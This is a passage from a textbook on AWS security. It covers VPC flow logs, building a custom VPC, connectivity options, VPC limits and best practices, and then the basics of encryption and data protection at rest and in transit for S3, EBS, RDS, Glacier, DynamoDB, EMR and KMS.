or vice versa. The VPC flow log is a very important security tool that helps monitor the
security of your network in the AWS cloud.
You can create a flow log for your VPC as well as a subnet and a network interface based on
your requirement. For a VPC flow log, all resources in VPC are monitored. For a subnet
flow log, all resources in a subnet are monitored. This can take up to 15 minutes to collect
data after you have created a flow log.
AWS Virtual Private Cloud
[ 93 ]
Each network interface has a unique log stream that is published to a log group in AWS
CloudWatch logs. You can create multiple flow logs publishing data to one log. These logs
streams consist of flow log records that are essentially log events with fields describing all
the traffic for that resource. Log streams contain flow log records, which are log events
consisting of fields that describe the traffic, such as the accepted traffic or rejected traffic for
that network interface.
You can configure the type of traffic you want to monitor, including accepted, rejected, or
all traffic for the flow log you create. You give this log a name in CloudWatch logs, where it
will be published, and choose a resource you want to monitor. You will also need
the Amazon Resource Name (ARN) of an IAM role that will be used to publish this flow
log to CloudWatch logs group. These flow logs are not real-time log streams.
You can also create flow logs for network interfaces created by other AWS services, such as
AWS RDS, AWS workspaces, and so on. However, these services cannot create flow logs;
instead, you should use AWS EC2 to create flow logs, either from the AWS console or
through the EC2 API. VPC flow logs are offered free of charge; you are charged only for
logs. You can delete a flow log if you no longer need it. It might take several minutes before
this deleted flow log stops collecting data for your network interface.
VPC flow logs have certain limitations. You cannot create VPC flow logs for peered VPCs
that are not in your AWS account. VPC flow logs can't be tagged. A flow log cannot be
modified after it is created; you need to delete this flow log and create another one with the
required configuration. Flow logs do not capture all types of traffic, such as traffic
generated by instances when they contact Amazon DNS servers, traffic to and from
169.254.169.254 for getting instance metadata, and so on.
VPC access control
As discussed in IAM, all AWS services require permission to access their resources. It is
imperative to define access control for VPC as well. You need to grant appropriate
permissions to all users, applications, and AWS services to access all VPC resources. You
can define granular, resource-level permissions for VPC, which allows you to control what
resources could be accessed or modified in your VPC.
You can give permissions such as managing a VPC, a read-only permission for VPC, or
managing a specific resource for VPC, such as a security group or a network ACL.
AWS Virtual Private Cloud
[ 94 ]
Creating VPC
Let's look at steps to create a custom VPC in an AWS account. This VPC will be created
using IPv4 Classless Inter-Domain Routing (CIDR) block. It will have one public subnet
and one public facing instance in this subnet. It will also have one private subnet and one
instance in private subnet. For instance, for a private subnet to access the internet, we will
use a NAT gateway in a public subnet. This VPC will have security groups and network
ACL configured to allow egress and ingress internet traffic along with routes configured to
support this scenario:
Create a VPC with a /16 IPv4 CIDR block such as 10.0.0.0/16.
1.
Create an internet gateway and attach it to this VPC.
2.
Create one subnet with /24 IPv4 CIDR block, such as 10.0.0.0/24, and call it a
3.
public subnet. Note that this CIDR block is a subset of a VPC CIDR block.
Create another subnet with /24 IPv4 CIDR block, such as 10.0.1.0/24 and call
4.
it a private subnet. Note that this CIDR block is a subset of a VPC CIDR block and
it does not overlap the CIDR block of a public subnet.
Create a custom route table and create a route for all traffic going to the internet
5.
to go through the internet gateway. Associate this route table with the public
subnet.
Create a NAT gateway and associate it with the public subnet. Allocate one
6.
Elastic IP address and associate it with the NAT gateway.
Create a custom route in the main route table for all traffic going to the internet to
7.
go through NAT gateway. Associate this route table with the private subnet. This
step will facilitate the routing of all internet traffic for instances in the private
subnet to go through the NAT gateway. This will ensure IP addresses for private
instances are not exposed to the internet.
Create a network ACL for each of these subnets. Configure rules that will define
8.
inbound and outbound traffic access for these subnets. Associate these NACLs
with their respective subnets.
Create security groups for instances to be placed in public and private subnets.
9.
Configure rules for these security groups as per the access required. Assign these
security groups with instances.
Create one instance each in the public and private subnet for this VPC. Assign a
10.
security group to each of them. An instance in a public subnet should have either
a public IP or an EIP address.
Verify that the public instance can access the internet and private instances can
11.
access the internet through the NAT gateway.
AWS Virtual Private Cloud
[ 95 ]
Once all steps are completed, our newly created custom VPC will have the following
architecture. Private instances are referred to as database servers and public instances are
referred to as Web servers in the diagram. Note that the NAT gateway should have the
Elastic IP address to send traffic to the internet gateway as the source IP address. This VPC
has both the public and private subnet in one availability zone; however, in order to have a
highly available and fault-tolerant architecture, you can have a similar configuration of
resources in additional availability zones:
Figure 11 - AWS custom VPC
AWS Virtual Private Cloud
[ 96 ]
VPC connectivity options
One of the major features of AWS VPC is the connectivity options it provides for securely
connecting various networks with their AWS networks. In this section, you will learn about
various connectivity options for AWS VPC, such as connecting remote customer
networks with VPC, connecting multiple VPCs into a shared virtual network, and so on. We
will look at three connectivity options in detail:
Connecting the user network to AWS VPC
Connecting AWS VPC with an other AWS VPC
Connecting the internal user with AWS VPC
Connecting user network to AWS VPC
You can extend and integrate your resources in your remote networks, such as compute
power, security, monitoring, and so on, by leveraging your resources in AWS VPC. By
doing this, your users can access all resources in AWS VPC seamlessly like any other
resource in internal networks. This type of connectivity requires you to have non-
overlapping IP ranges for your networks on the cloud and on-premises, so ensure that you
have a unique CIDR block for your AWS VPC. AWS recommends that you use a unique,
single, non-overlapping, and contiguous CIDR block for every VPC. You can connect your
network with AWS VPC securely in the following ways:
Hardware VPN: You can configure AWS-compatible customer VPN gateways to
access AWS VPC over an industry standard, encrypted IPSec hardware VPN
connection. You are billed for each VPN connection hour, that is, for every hour
your VPC connection is up and running. Along with it, you are charged for data
transfer as well.
This option is easier to configure and install and uses an existing internet
connection. It is also highly available as AWS provides two VPN tunnels in
an active and standby mode by default. AWS provides virtual private
gateway with two endpoints for automatic failover. You need to configure,
customer gateway side of this VPN connection, this customer gateway could
be software or hardware in your remote network.
On the flip side, hardware VPN connections have data transfer speed
limitation. Since they use an internet to establish connectivity, the
performance of this connection, including network latency and availability, is
dependent on the internet condition.
AWS Virtual Private Cloud
[ 97 ]
Direct connect: You can connect your AWS VPC to your remote network using a
dedicated network connection provided by AWS authorized partners over 1-
gigabit or 10-gigabit Ethernet fiber-optic cable. One end of this cable is connected
to your router, the other to an AWS Direct Connect router. You get improved,
predictable network performance with reduced bandwidth cost. With direct
connect, you can bypass the internet and connect directly to your resources in
AWS, including AWS VPC.
You can pair direct connect with a hardware VPN connection for a
redundant, highly available connectivity between your remote networks and
AWS VPC. The following diagram shows the AWS direct connect service
interfacing with your remote network:
Figure 12 - AWS direct connect
AWS Virtual Private Cloud
[ 98 ]
AWS VPN CloudHub: You might have multiple remote networks that need to
connect securely with AWS VPC. For such scenarios, you will create multiple
VPN connections, and you will use AWS VPN CloudHub to provide secure
communication between these sites. This is a hub and spoke model that can be
used either for primary connectivity or as a backup option. It uses existing
internet connections and VPN connections.
You create a virtual private gateway for your VPC with multiple customer
gateways for your remote networks to use AWS VPN CloudHub. These
remote networks should not have overlapping IP networks. The pricing
model for this option is similar to that of a hardware VPN connection.
Software VPN: Instead of a hardware VPN connection, you can also use an EC2
instance in your VPC with a software VPN appliance running in order to connect
your remote network. AWS does not provide any software VPN appliance;
however, you can use software VPN appliances through a range of products
provided by AWS partners and various open source communities present on
AWS marketplace. It also uses the internet for connectivity; hence, reliability,
availability, and network performance are dependent on the internet speed.
This option, however, supports a wide variety of VPN vendors, products,
and protocols. It is completely managed by customers. It is helpful for
scenarios where you are required to manage both ends of a connection, either
for compliance purposes or if you are using connectivity devices that are
currently not supported by AWS.
Connecting AWS VPC with other AWS VPC
If you have multiple VPCs in multiple regions across the globe, you may want to connect
these VPCs to create a larger, secure network. This connectivity option works only if your
VPCs do not have overlapping IP ranges and have a unique CIDR block. Let's look at the
following ways to connect AWS VPC with other AWS VPCs:
VPC peering: You can connect two VPCs in the same region using a VPC peering option in
AWS VPC. Resources in these VPCs can communicate with each other using private IP
addresses as if they are in the same network. You can have a VPC peering connection with a
VPC in your AWS account and VPC in other AWS accounts as long as they are in the same
region.
AWS uses its own existing infrastructure for this connection. It is not a gateway or a VPN
connection that uses any physical device. It is not a single point of failure or a network
performance bottleneck.
AWS Virtual Private Cloud
[ 99 ]
VPC peering is the most preferred method of connecting AWS VPCs. It is suited for many
scenarios for large and small organizations. Let's look at some of the most common
scenarios.
If you need to provide full access to resources across two or more VPCs, you can do that by
peering them. For example, you have multiple branch offices in various regions across the
globe and each branch office has a different VPC. Your headquarter needs to access all
resources for all VPCs for all your branch offices. You can accomplish this by creating a
VPC in each region and peering all other VPCs with your VPC.
You might have a centralized VPC that contains information required by other VPCs in
your organization, such as policies related to human resources. This is a read-only VPC and
you would not want to provide full access to resources in this VPC. You can create VPC
peering connection and restrict access for this centralized VPC.
You can also have a centralized VPC that might be shared with your customers. Each
customer can peer their VPC with your centralized VPC, but they cannot access resources in
other customers' VPC.
Data transfer charges for a VPC peering connection are similar to charges for data transfer
across availability zones. As discussed, VPC peering is limited to VPCs in the same region.
A VPC peering is a one-to-one connection between two VPCs; transitive peering is not
allowed for a peering connection. In the following diagram, VPC A is peered with VPC B
and VPC C; however, VPC B is not peered with VPC C implicitly. It has to be peered
explicitly:
Figure 13 - AWS VPC Transitive Peering
Apart from VPC peering, there are other options for connecting VPCs, such as software
VPN, hardware VPN, and AWS direct connect as well. All of these options have benefits
and limitations similar to the one discussed in the previous section.
AWS Virtual Private Cloud
[ 100 ]
Connecting internal user with AWS VPC
If you want to allow your internal users to access resources in AWS VPC, you can leverage
your existing remote networks to AWS VPC connections using either hardware VPN, direct
connect, or software VPN depending on your requirement. Alternatively, you can combine
these connectivity options to suit your requirements, such as cost, speed, reliability,
availability, and so on.
VPC limits
AWS VPC has limits for various components in a region. Most of these are soft limits and
can be increased by contacting AWS support from the AWS console and submitting a
request by filling the Amazon VPC limits form available in the AWS console.
Let's look at these limits:
Resource
Default limit
VPCs per region
5
Subnets per VPC
200
Elastic IP addresses per region
5
Flow logs per resource in a region
2
Customer gateways per region
50
Internet gateways per region
5
NAT gateways per availability zone
5
Virtual private gateways per region
5
Network ACLs per VPC
200
Rules per network ACL
20
Network interfaces per region
350
Route tables per VPC
200
Routes per route table
50
Security groups per VPC (per region)
500
Rules per security group
50
AWS Virtual Private Cloud
[ 101 ]
Security groups per network interface
5
Active VPC peering connections per VPC
50
VPC endpoints per region
20
VPN connections per region
50
VPN connections per VPC (per virtual private gateway) 10
Table 1 - AWS VPC limit
VPC best practices
In this section, we will go through an exhaustive list of best practices to be followed for
AWS VPC. Most of these are recommended by AWS as well. Implementing these best
practices will ensure that your resources, including your servers, data, and applications, are
integrated with other AWS services and secured in AWS VPC. Remember that VPC is not a
typical data center and it should not be treated as one.
Plan your VPC before you create it
Always start by planning and designing architecture for your VPC before you create it. A
bad VPC design will have serious implications on the flexibility, scalability, availability, and
security of your infrastructure. So, spend a good amount of time planning out your VPC
before you actually start creating it.
Start with the objective of creating a VPC: is it for one application or for a business unit?
Spec out all subnets you will need and figure out your availability and fault- tolerance
requirements. Find out what all connectivity options you will need for connecting all
internal and external networks. You might need to plan for a number of VPCs if you need to
connect with networks in more than one region.
AWS Virtual Private Cloud
[ 102 ]
Choose the highest CIDR block
Once you create VPC with a CIDR block, you cannot change it. You will have to create
another VPC and migrate your resources to a new VPC if you want to change your CIDR
block. So, take a good look at your current resources and your requirements for the next few
years in order to plan and design your VPC architecture. A VPC can have a CIDR block
ranging from /16 to /28, which means you can have between 65,536 and 16 IP addresses
for your VPC. AWS recommends that you choose the highest CIDR block available, so
always go for /16 CIDR block for your VPC. This way, you won't be short of IP addresses if
you need to increase your instances exponentially.
Unique IP address range
All VPC connectivity options require you to have non-overlapping IP ranges. Consider
future connectivity to all your internal and external networks. Make sure you take note of
all available IP ranges for all your environments, including remote networks, data centers,
offices, other AWS VPCs, and so on, before you assign CIDR ranges for your VPC. None of
these should conflict and overlap with any network that you want to connect with.
Leave the default VPC alone
AWS provides a default VPC in every region for your AWS account. It is best to leave this
VPC alone and start with a custom VPC for your requirement. The default VPC has all
components associated with it; however, the security configuration of all these components,
such as subnets, security groups, and network ACLs are quite open to the world. There is
no private subnet either. So, it is a good idea to create your own VPC from scratch using
either a VPC wizard in the AWS console or creating it manually through the AWS console
or AWS CLI. You can configure all resources as per your requirement for your custom VPC.
Moreover, by default, if a subnet is not associated with a route table or an NACL, it is
associated with the main route table and default NACL. These two components don't have
any restrictions on inbound and outbound traffic, and you risk exposing your resources to
the entire world.
You should not modify the main route table either; doing that might give other subnets
routes that they shouldn't be given. Always create a custom route table and keep the main
route table as it is.
AWS Virtual Private Cloud
[ 103 ]
Design for region expansion
AWS keeps on expanding its regions by adding more availability zones to them. We know
that one subnet cannot span more than one availability zone, and distributing our resources
across availability zones makes our application highly available and fault-tolerant. It is a
good idea to reserve some IP address for future expansion while creating subnets with a
subset of VPC CIDR block. By default, AWS reserves five IP address in every subnet for
internal usage; make a note of this while allocating IP addresses to a subnet.
Tier your subnets
Ideally, you should design your subnets according to your architecture tiers, such as the
database tier, the application tier, the business tier, and so on, based on their routing needs,
such as public subnets needing a route to the internet gateway, and so on. You should also
create multiple subnets in as many availability zones as possible to improve your fault-
tolerance. Each availability zone should have identically sized subnets, and each of these
subnets should use a routing table designed for them depending on their routing need.
Distribute your address space evenly across availability zones and keep the reserved space
for future expansion.
Follow the least privilege principle
For every resource you provision or configure in your VPC, follow the least privilege
principle. So, if a subnet has resources that do not need to access the internet, it should be a
private subnet and should have routing based on this requirement. Similarly, security
groups and NACLs should have rules based on this principle. They should allow access
only for traffic required. Do not add a route to the internet gateway to the main route table
as it is the default route table for all subnets.
Keep most resources in the private subnet
In order to keep your VPC and resources in your VPC secure, ensure that most of the
resources are inside a private subnet by default. If you have instances that need to
communicate with the internet, then you should add an Elastic Load Balancer (ELB) in the
public subnet and add all instances behind this ELB in the private subnet.
Use NAT devices (a NAT instance or a NAT gateway) to access public networks from your
private subnet. AWS recommends that you use a NAT gateway over a NAT instance as the
NAT gateway is a fully managed, highly available, and redundant component.
AWS Virtual Private Cloud
[ 104 ]
Creating VPCs for different use cases
You should ideally create one VPC each for your development, testing, and production
environments. This will secure your resources from keeping them separate from each other,
and it will also reduce your blast radius, that is, the impact on your environment if one of
your VPCs goes down.
For most use cases such as application isolation, multi-tenant application, and business unit
alignment, it is a good idea to create a separate VPC.
Favor security groups over NACLs
Security groups and NACLs are virtual firewalls available for configuring security rules for
your instances and subnets respectively. While security groups are easier to configure and
manage, NACLs are different. It is recommended that NACLs be used sparingly and not be
changed often. NACLs should be the security policy for your organization as it does not
work at a granular level. NACL rules are tied to the IP address and for a subnet, with the
addition of every single rule, the complexity and management of these rules becomes
exponentially difficult.
Security group rules are tied to instances and these rules span the entire VPC; they are
stateful and dynamic in nature. They are easier to manage and should be kept simple.
Moreover, security groups can pass other security groups as an object reference in order to
allow access, so you can allow access to your database server security group only for the
application server security group.
IAM your VPC
Access control for your VPC should be on top of your list while creating a VPC. You can
configure IAM roles for your instances and assign them at any point. You can provide
granular access for provisioning new resources inside a VPC and reduce the blast radius by
restricting access to high-impact components such as various connectivity options, NACL
configuration, subnet creation, and so on.
There will usually be more than one person managing all resources for your VPC; you
should assign permissions to these people based on their role and by following the principle
of least privileges. If someone does not need access to a resource, that access shouldn't be
given in the first place.
AWS Virtual Private Cloud
[ 105 ]
Periodically, use the access advisor function available in IAM to find out whether all the
permissions are being used as expected and take necessary actions based on your findings.
Create an IAM VPC admin group to manage your VPC and its resources.
Using VPC peering
Use VPC peering whenever possible. When you connect two VPCs using the VPC peering
option, instances in these VPCs can communicate with each other using a private IP
address. For a VPC peering connection, AWS uses its own network and you do not have to
rely on an external network for the performance of your connection, and it is a lot more
secure.
Using Elastic IP instead of public IP
Always use Elastic IP (EIP) instead of public IP for all resources that need to connect to the
internet. The EIPs are associated with an AWS account instead of an instance. They can be
assigned to an instance in any state, whether the instance is running or whether it is
stopped. It persists without an instance so you can have high availability for your
application depending on an IP address. The EIP can be reassigned and moved to Elastic
Network Interface (ENI) as well. Since these IPs don't change, they can be whitelisted by
target resources.
All these advantages of EIP over a public IP make it more favorable when compared with a
public IP.
Tagging in VPC
Always tag your resources in a VPC. The tagging strategy should be part of your planning
phase. A good practice is to tag a resource immediately after it is created. Some common
tags include version, owner, team, project code, cost center, and so on. Tags are supported
by AWS billing and for resource-level permissions.
AWS Virtual Private Cloud
[ 106 ]
Monitoring a VPC
Monitoring is imperative to the security of any network, such as AWS VPC. Enable AWS
CloudTrail and VPC flow logs to monitor all activities and traffic movement. The AWS
CloudTrail will record all activities, such as provisioning, configuring, and modifying all
VPC components. The VPC flow log will record all the data flowing in and out of the VPC
for all the resources in VPC. Additionally, you can set up config rules for the AWS Config
service for your VPC for all resources that should not have changes in their configuration.
Connect these logs and rules with AWS CloudWatch to notify you of anything that is not
expected behavior and control changes within your VPC. Identify irregularities within your
network, such as resources receiving unexpected traffic in your VPC, adding instances in
the VPC with configuration not approved by your organization, among others.
Similarly, if you have unused resources lying in your VPC, such as security groups, EIP,
gateways, and so on, remove them by automating the monitoring of these resources.
Lastly, you can use third-party solutions available on AWS marketplace for monitoring
your VPC. These solutions integrate with existing AWS monitoring solutions, such as AWS
CloudWatch, AWS CloudTrail, and so on, and provide information in a user-friendly way
in the form of dashboards.
Summary
The VPC is responsible for securing your network, including your infrastructure on the
cloud, and that makes this AWS service extremely critical for mastering security in AWS. In
this chapter, you learned the basics of VPC, including features, benefits, and most common
use cases.
We went through the various components of VPC and you learned how to configure all of
them to create a custom VPC. Alongside, we looked at components that make VPC secure,
such as routing, security groups, and so on.
We also looked at multiple connectivity options, such as a private, shared, or dedicated
connection provided by VPC. These connectivity options enable us to create a hybrid cloud
environment, a large connected internal network for your organization, and many such
secure, highly available environments to address many more scenarios.
AWS Virtual Private Cloud
[ 107 ]
Lastly, you learned about the limits of various VPC components and we looked at an
exhaustive list of VPC best practices.
In the next chapter, we will look at ways to secure data in AWS: data security in AWS in a
nutshell. You will learn about encrypting data in transit and at rest. We will also look at
securing data using various AWS services.
4
Data Security in AWS
Data security in the AWS platform can be classified into two broad categories:
Protecting data at rest
Protecting data in transit
Furthermore, data security has the following components that help in securing data in
multiple ways:
Data encryption
Key Management Services (KMS)
Access control
AWS service security features
AWS provides you with various tools and services to secure your data in AWS when your
data is in transit or when your data is at rest. These tools and services include resource
access control using AWS Identity and Access Management (IAM), data encryption, and
managed KMS, such as AWS KMS for creating and controlling keys used for data
encryption. The AWS KMS provides multiple options for managing your entire Key
Management Infrastructure (KMI). Alternatively, you also have the option to go with the
fully managed AWS CloudHSM service, a cloud-based hardware security module (HSM)
that helps you generate and use your own keys for encryption purpose.
AWS recently launched a new security service to protect your sensitive data by using
machine learning algorithms; this service is called Amazon Macie. As of now, it offers
security for all data stored in your Amazon Simple Storage Service (S3).
Data Security in AWS
[ 109 ]
If you want to protect your data further due to business or regulatory compliance purposes,
you can enable additional features for accidental deletion of data such as the versioning
feature in AWS S3, MFA for accessing and deleting data, enable cross-region replication for
more than one copy of your data in AWS S3, and so on.
All data storage and data processing AWS services provide multiple features to secure your
data. Such features include data encryption at rest, data encryption in transit, MFA for
access control and for deletion of data, versioning for accidental data deletion, granular
access control and authorization policies, cross-region replication, and so on.
Chapter overview
In this chapter, we will learn about protecting data in the AWS platform for various AWS
services. To begin with, we will go over the fundamentals of encryption and decryption and
how encryption and decryption of data work in AWS. Post that, we will start with security
features for securing data in transit and at rest for each of the following AWS services:
Amazon Simple Storage Service (S3)
Amazon Elastic Block Storage (EBS)
Amazon Relational Database Service (RDS)
Amazon Glacier
Amazon DynamoDB
Amazon Elastic Map Reduce (EMR)
We will look at data encryption in AWS and we will learn about three models that are
available for managing keys for encryption and how we can use these models for
encrypting data in various AWS services such as, AWS S3, Amazon EBS, AWS Storage
Gateway, Amazon RDS, and so on.
Next, we will deep dive on AWS KMS and go through KMS features and major KMS
components.
Data Security in AWS
[ 110 ]
Furthermore, we will go through the AWS CloudHSM service with its benefits and popular
use cases.
Lastly, we will take a look at Amazon Macie, the newest security service launched by AWS
to protect sensitive data using machine learning at the backend.
Encryption and decryption fundamentals
Encryption of data can be defined as converting data known as plaintext into code, often
known as ciphertext, that is unreadable by anyone except the intended audience. Data
encryption is the most popular way of adding another layer of security for preventing
unauthorized access and use of data. Encryption is a two-step process: in the first step, data
is encrypted using a combination of an encryption key and an encryption algorithm, in the
second step, data is decrypted using a combination of a decryption key and a decryption
algorithm to view data in its original form.
The following three components are required for encryption. These three components work
hand in hand for securing your data:
Data to be encrypted
Algorithm for encryption
Encryption keys to be used alongside the data and the algorithm
There are two types of encryption available, symmetric and asymmetric. Asymmetric
encryption is also known as public key encryption. Symmetric encryption uses the same
secret key to perform both the encryption and decryption processes. On the other hand,
asymmetric encryption uses two keys, a public key for encryption and a corresponding
private key for decryption, making this option more secure and at the same time more
difficult to maintain as you would need to manage two separate keys for encryption and
decryption.
AWS only uses symmetric encryption
Data Security in AWS
[ 111 ]
For encrypting data in AWS, the plaintext data key is used to convert plaintext data into
ciphertext using the encryption algorithm. The following figure shows a typical workflow
of the data encryption process in AWS:
Figure 1 - AWS encryption workflow
Decryption converts the encrypted data (ciphertext) into plaintext, essentially reversing the
encryption process. For decrypting data in AWS, ciphertext uses the plaintext data key for
converting ciphertext into plaintext by applying the decryption algorithm. The following
figure shows the AWS decryption workflow for converting ciphertext into plaintext:
Figure 2 - AWS decryption workflow
Data Security in AWS
[ 112 ]
Envelope encryption
AWS uses envelope encryption, a process to encrypt data directly. This process provides a
balance between the process and security for encrypting your data. This process has the
following steps for encrypting and storing your data:
The AWS service being used for encryption will generate a data key when a user
1.
requests data to be encrypted.
This data key is used to encrypt data along with the encryption algorithm.
2.
Once the data is encrypted, the data key is encrypted as well by using the key-
3.
encrypting key that is unique to the AWS service used to store your data such, as
AWS S3.
This encrypted data and encrypted data key are stored in the AWS storage
4.
service.
Note that the key-encrypting key also known as master key is stored and managed
separately from the data and the data key itself. When decrypted data is required to be
converted to plaintext data, the preceding mentioned process is reversed.
The following figure depicts the end-to-end workflow for the envelope encryption process;
the master key in the following figure is the key-encrypting key:
Figure 3 - AWS envelope encryption
Data Security in AWS
[ 113 ]
Securing data at rest
You might be required to encrypt your data at rest for all AWS services or for some of the
AWS storage services depending on your organizational policies, industry or government
regulations, compliance, or simply for adding another layer of security for your data. AWS
provides several options for encrypting data at rest including fully automated and fully
managed AWS encryption solutions, manual encryption solutions, client-side encryption,
and so on. In this section, we are going to go over these options for each AWS storage
service.
Amazon S3
The S3 is one of the major and most commonly used storage services in the AWS platform.
It supports a wide range of use cases such as file storage, archival records, disaster recovery,
website hosting, and so on. The S3 provides multiple features to protect your data such as
encryption, MFA, versioning, access control policies, cross-region replication, and so on. Let
us look at these features for protecting your data at rest in S3:
Permissions
The S3 gives you an option to add bucket level and object level permissions in addition to
the IAM policies for better access control. These permissions allow you to control
information theft, data integrity, unauthorized access, and deletion of your data.
Versioning
The S3 has a versioning feature that maintains all versions of objects that are modified or
deleted in a bucket. Versioning prevents accidental deletion and overwrites for all your
objects. You can restore an object to its previous version if it is compromised. Versioning is
disabled by default. Once versioning is enabled for a bucket, it can only be suspended. It
cannot be disabled.
Data Security in AWS
[ 114 ]
Replication
In order to provide the 11 9s of durability (99.999999999), S3 replicates each object stored
across all availability zones within the respective region. This process ensures data
availability in the event of a disaster by maintaining multiple copies of your data within a
region. The S3 also offers a cross region replication feature that is used to automatically and
asynchronously replicate objects stored in your bucket from one region to an S3 bucket in
another region. This bucket level feature can be used to backup your s3 objects across
regions.
Server-Side encryption
The S3 provides server-side encryption feature for encrypting user data. This encryption
process is transparent to the end user (client) as it is performed at the server side. AWS
manages the master key used for this encryption and ensures that this key is rotated on a
regular basis. AWS generates a unique encryption key for each object and then encrypts the
object using AES-256. The encryption key then encrypts itself using AES-256, with a master
key that is stored in a secure location.
Client-Side encryption
The AWS also supports client-side encryption where encryption keys are created and
managed by you. Data is encrypted by your applications before it is submitted to AWS for
storage and the data is decrypted after it is received from the AWS services. The data is
stored in the AWS service in an encrypted form and AWS has no knowledge of encryption
algorithms or keys used to encrypt this data. You can also use either symmetric or
asymmetric keys along with any encryption algorithm for client-side encryption. AWS
provided Java SDK, offers client-side encryption features for Amazon S3.
Amazon EBS
Amazon EBS is an abstract block storage service providing persistent block level storage
volumes. These volumes are attached to Amazon Elastic Compute Cloud (EC2) instances.
Each of these volumes is automatically replicated within its availability zone that protects
against component failure of an EBS volume. Let us look at options available to protect data
at rest, stored in EBS volumes that are attached to an EC2 instance.
Data Security in AWS
[ 115 ]
Replication
AWS stores each EBS volume as a file and creates two copies of this volume in the same
availability zone. This replication process provides redundancy against hardware failure.
However, for the purpose of disaster recovery, AWS recommends replicating data at the
application level.
Backup
You can create snapshots for your EBS volumes to get point in time copies of your data
stored in EBS volume. These snapshots are stored in AWS S3 so they provide the same
durability as any other object stored in S3. If an EBS volume is corrupt or if data is modified
or deleted from an EBS volume, you can use snapshots to restore the data to its desired
state. You can authorize access for these snapshots through IAM as well. These EBS
snapshots are AWS objects to which you can assign permissions for your IAM identities
such as users, groups, and roles.
Encryption
You can encrypt data in your EBS volumes using AWS native encryption features such as
AWS KMS. When you create an snapshot of an encrypted volume, you get an encrypted
snapshot. You can use these encrypted EBS volume to store your data securely at rest and
attach these to your EC2 instances.
The Input Output Per Second (IOPS) performance of an encrypted volume is similar to an
unencrypted volume, with negligible effect on latency. Moreover, an encrypted volume can
be accessed in a similar way as an unencrypted volume. One of the best parts about
encrypting EBS volume is that both encryption and decryption require no additional action
from the user, EC2 instance, or the user's application, and they are handled transparently.
Snapshots of encrypted volumes are automatically encrypted. Volumes created using these
encrypted snapshots are also automatically encrypted.
Amazon RDS
Amazon RDS enables you to encrypt your data for EBS volumes, snapshots, read replicas
and automated backups of your RDS instances. One of the benefits of working with RDS is
that you do not have to write any decryption algorithm to decrypt your encrypted data
stored in RDS. This process of decryption is handled by Amazon RDS.
Data Security in AWS
[ 116 ]
Amazon Glacier
AWS uses AES-256 for encrypting each Amazon Glacier archive and generates separate
unique encryption keys for each of these archives. By default, all data stored on Amazon
Glacier is protected using the server-side encryption. The encryption key is then encrypted
itself by using the AES-256 with a master key. This master key is rotated regularly and
stored in a secure location.
Additionally, you can encrypt data prior to uploading it to the Amazon Glacier if you want
more security for your data at rest.
Amazon DynamoDB
Amazon DynamoDB can be used without adding protection. However, for additional
protection, you can also implement a data encryption layer over the standard DynamoDB
service. DynamoDB supports number, string, and raw binary data type formats. When
storing encrypted fields in DynamoDB, it is a best practice to use raw binary fields or
Base64-encoded string fields.
Amazon EMR
Amazon EMR is a managed Hadoop Framework service in the cloud. AWS provides the
AMIs for Amazon EMR, and you can’t use custom AMIs or your own EBS volumes.
Amazon EMR automatically configures Amazon EC2 firewall settings such as network
access control list (ACL) and security groups for controlling network access for instances.
These EMR clusters are launched in an Amazon Virtual Private Cloud (VPC).
By default, Amazon EMR instances do not encrypt data at rest. Usually, EMR clusters store
data in S3 or in DynamoDB for persistent data. This data can be secured using the security
options for these Amazon services as mentioned in the earlier sections.
Securing data in transit
Most of the web applications that are hosted on AWS will be sending data over the internet
and it is imperative to protect data in transit. This transit will involve network traffic
between clients and servers, and network traffic between servers. So data in transit needs to
be protected at the network layer and the session layer.
Data Security in AWS
[ 117 ]
AWS services provide IPSec and SSL/TLS support for securing data in transit. An IPSec
protocol extends the IP protocol stack primarily for the network layer and allows
applications on the upper layers to communicate securely without modification. The
SSL/TLS, however, operates at the session layer.
The Transport Layer Security (TLS) is a standard set of protocols for securing
communications over a network. TLS has evolved from Secure Sockets Layer (SSL) and is
considered to be a more refined system.
Let us look at options to secure network traffic in AWS for various AWS services.
Amazon S3
The AWS S3 supports the SSL/TLS protocol for encrypting data in transit by default. All
data requests in AWS S3 is accessed using HTTPS. This includes AWS S3 service
management requests such as saving an object to an S3 bucket, user payload such as content
and the metadata of objects saved, modified, or fetched from S3 buckets.
You can access S3 using either the AWS Management Console or through S3 APIs.
When you access S3 through AWS Management Console, a secure SSL/TLS connection is
established between the service console endpoint and the client browser. This connection
secures all subsequent traffic for this session.
When you access S3 through S3 APIs that is through programs, an SSL/TLS connection is
established between the AWS S3 endpoint and client. This secure connection then
encapsulates all requests and responses within this session.
Amazon RDS
You have an option to connect to the AWS RDS service through your AWS EC2 instance
within the same region. If you use this option, you can use the existing security of the AWS
network and rely on it. However, if you are connecting to AWS RDS using the internet,
you'll need additional protection in the form of TLS/SSL.
As of now SSL/TLS is currently supported by AWS RDS MySQL and Microsoft SQL
instance connections only.
AWS RDS for Oracle native network encryption encrypts the data in transit. It helps you to
encrypt network traffic traveling over Oracle Net services.
Data Security in AWS
[ 118 ]
Amazon DynamoDB
You can connect to AWS DynamoDB using other AWS services in the same region and
while doing so, you can use the existing security of AWS network and rely on it. However,
while accessing AWS DynamoDB from the internet, you might want to use HTTP over
SSL/TLS (HTTPS) for enhanced security. AWS advises users to avoid HTTP access for all
connections over the internet for AWS DynamoDB and other AWS services.
Amazon EMR
Amazon EMR offers several encryption options for securing data in transit. These options
are open source features, application specific, and vary by EMR version.
For traffic between Hadoop nodes, no additional security is usually required as all nodes
reside in the same availability zone for Amazon EMR. These nodes are secured by the AWS
standard security measures at the physical and infrastructure layer.
For traffic between Hadoop cluster and Amazon S3, Amazon EMR uses HTTPS for sending
data between EC2 and S3. It uses HTTPS by default for sending data between the Hadoop
cluster and the Amazon DynamoDB as well.
For traffic between users or applications interacting with the Hadoop cluster, it is advisable
to use SSH or REST protocols for interactive access to applications. You can also use Thrift
or Avro protocols along with SSL/TLS.
For managing a Hadoop cluster, you would need to access the EMR master node. You
should use SSH to access the EMR master node for administrative tasks and for managing
the Hadoop cluster.
AWS KMS
AWS KMS is a fully managed service that supports encryption for your data at rest and
data in transit while working with AWS services. AWS KMS lets you create and manage
keys that are used to encrypt your data. It provides a fully managed and highly available
key storage, management and auditing solution that can be used to encrypt data across
AWS services as well as to encrypt data within your applications. It is low cost as default
keys are stored in your account at no charge – you pay for key usage and for creating any
additional master keys.
Data Security in AWS
[ 119 ]
KMS benefits
AWS KMS has various benefits such as importing your own keys in KMS and creating keys
with aliases and description. You can disable keys temporarily and re-enable them. You can
also delete keys that are no longer required or used. You can rotate your keys periodically
